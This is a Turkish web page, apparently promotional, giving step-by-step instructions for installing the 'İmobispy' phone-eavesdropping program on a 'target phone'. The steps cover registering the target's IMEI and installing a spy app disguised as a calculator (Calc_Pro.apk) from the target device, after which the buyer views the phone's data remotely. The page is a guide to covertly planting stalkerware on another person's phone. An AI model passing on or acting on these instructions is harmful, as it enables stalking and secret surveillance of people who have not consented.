İmobispy telefon dinleme programının hedef telefona kurulumu oldukça basittir bunu en kısa şekilde aşağıda sizlere açıklamaya çalışalım. Çok kolay 3 Temel adım vardır.

1. Bilgisayarınızdan yapılacak işlem 1:   
İmobispy yazılımı online resmi sitesinden satın alınır.  Şimdi Satın Al
2.Bilgisayarınızdan yapılacak işlem 2:

Satın alır almaz en geç 5 dakika içerisinde e-mailinize imobispy dan aşağıdaki gibi bir mail gelir. Bilgisayarınızdan bu e-mailde bulunan Click Here yazan yere tıklayıp hedef telefonunuzu IMEI numarası ile kaydettirmelisiniz. ( imei numarası telefona *#06# tuşladığınızda karşınıza gelen numaradır)

Yukarıdaki e-mailde belirtilen Click Here yazan yere tıklayınca karşınıza gelicek sayfadan, yükleme yapıcağınız telefonu  imei numarasıyla kaydettirin. Telefon işletim sisteminizi seçin ve imei numaranızı girip Register yazan yere tıklayın. Böylece kayıt işlemini yapmış olursunuz. ( Bu işlem bilgisayardan yapılır )
IMEI KAYIT SAYFASI ŞU ŞEKİLDEDİR
3. Yükleme yapıcağınız telefondan yapılacak işlem: Telefonu bilgisayarınızdan yukarıdaki gibi kayıt ettirdikten hemen sonra imobispy tarafından size bir e-mail daha gönderilecektir. Bu defa e-mailinize bilgisayardan değilde hedef telefon üzerinden giriş yapın ve yeni gönderilen e-mailde yer alan Calc_Pro.apk isimli dosyaya tıklayın ve telefona yükleyin. Yükleme işlemi çok kısa sürecek ve bitecektir, işlem bu kadar basittir.
Yüklemeden sonra artık imobispy hesabınıza bilgisayardan giriş yapıp telefondan gelen bilgileri görebilirsiniz.
Hedef telefondan e-mailinize giriş yapıp ikinci gelen  e-maildeki Calc_Pro.apk   dosyasına tıkladığınızda yükleme işlemi şu şekilde olucaktır.
 
Resimli Olarak Anlatım
 
 E-mailinizdeki Calc_Pro.apk dosyasına tıklayınca yükleme işlemi başlar.

 

Sorulduğunda yukarıdaki seçenek seçilir

 

Sonra İnstall seçeneği seçilir

 

Yükleme devam eder

 

Done seçeneğine tıklanır ve kurulum bitirilir. Artık bu aşamadan sonra imobispy hesabınıza bilgisayardan giriş yapıp telefon dan gelen verileri görebilirsiniz.

 

300 Okunma 03 Kas 2015

Yorumlar


Sen de Yorumla!